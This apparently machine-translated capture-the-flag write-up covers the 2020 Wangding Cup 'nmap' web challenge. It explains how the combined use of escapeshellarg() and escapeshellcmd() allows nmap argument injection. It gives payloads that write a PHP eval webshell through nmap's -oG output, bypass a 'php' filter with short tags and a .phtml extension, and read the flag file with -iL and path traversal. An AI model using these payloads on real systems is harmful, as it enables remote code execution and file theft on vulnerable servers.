当前位置:网站首页>2020 WANGDING cup_ Rosefinch formation_ Web_ nmap
2020 WANGDING cup_ Rosefinch formation_ Web_ nmap
2022-07-06 11:32:00 【Her&mes】
WP
Two inspection points
1. Investigate nmap Use
2. Investigate escapeshellarg() And escapeshellcmd() Mixed use vulnerability
The first one is OK to say , The title tells
The second point , I do not know! , I don't know where I got it , Autistic ing
Look at other masters wp, Referred to the [BUUCTF 2018]Online Tool, A code audit question , It directly tells the parameter process escapeshellarg() And escapeshellcmd() Handle
The two questions cannot be said to be the same , Can only say exactly the same .
nmap Use output related parameters
stay nmap Chinese net The following results can be found in :
-oN ( standard output )
-oX (XML Output )
-oS (ScRipT KIdd|3 oUTpuT)
-oG (Grep Output )
-oA ( Output to all formats )
There are other miscellaneous outputs , You can check it out , Here we use -oG structure payload
payload The subject is
<?php @eval($_POST["hack"]);?> -oG hack.php
However, echo after sending hacker word
There's a filter , Conduct fuzz test ,php The filtered , however phtml No, , And use php The short label of can replace <?php, That is to say :
<?= @eval($_POST["hack"]);?> -oG hack.phtml
Not yet here , In this way parload after escapeshellarg() And escapeshellcmd() Function processing , Can't generate files
The solution is simple , Just add spaces and single quotes , In this way, it can produce a normal parsing php file
' <?= @eval($_POST["hack"]);?> -oG hack.phtml '
The specific principle is written by the boss PHP escapeshellarg()+escapeshellcmd() Regression of
stay CSDN There are other masters' writings on escapeshellarg() And escapeshellcmd() Analysis of , simple
Except for writing webshell, There are also direct reading methods , Take advantage of -iL Parameters
' -iL ../../../../flag -o a '
Direct access a Just go , The following can also be done , But to visit a’
' -iL ../../../../flag -o a
The reason is also those two functions .
边栏推荐
- About string immutability
- L2-007 家庭房产 (25 分)
- Integration test practice (1) theoretical basis
- Deoldify project problem - omp:error 15:initializing libiomp5md dll,but found libiomp5md. dll already initialized.
- Vs2019 first MFC Application
- QT creator shape
- Valentine's Day flirting with girls to force a small way, one can learn
- Did you forget to register or load this tag
- 保姆级出题教程
- [Bluebridge cup 2020 preliminary] horizontal segmentation
猜你喜欢
error C4996: ‘strcpy‘: This function or variable may be unsafe. Consider using strcpy_ s instead
C语言读取BMP文件
Valentine's Day flirting with girls to force a small way, one can learn
Introduction and use of automatic machine learning framework (flaml, H2O)
Pytorch基础
Software I2C based on Hal Library
引入了junit为什么还是用不了@Test注解
QT creator create button
Case analysis of data inconsistency caused by Pt OSC table change
解决安装Failed building wheel for pillow
随机推荐
How to build a new project for keil5mdk (with super detailed drawings)
Ansible practical series I_ introduction
One click extraction of tables in PDF
解决安装Failed building wheel for pillow
Machine learning notes week02 convolutional neural network
yarn安装与使用
double转int精度丢失问题
Rhcsa certification exam exercise (configured on the first host)
Image recognition - pyteseract TesseractNotFoundError: tesseract is not installed or it‘s not in your path
【kerberos】深入理解kerberos票据生命周期
QT creator runs the Valgrind tool on external applications
Pytoch Foundation
Machine learning -- census data analysis
ES6 let and const commands
Introduction to the easy copy module
About string immutability
Project practice - background employee information management (add, delete, modify, check, login and exit)
[number theory] divisor
Unable to call numpy in pycharm, with an error modulenotfounderror: no module named 'numpy‘
vs2019 使用向导生成一个MFC应用程序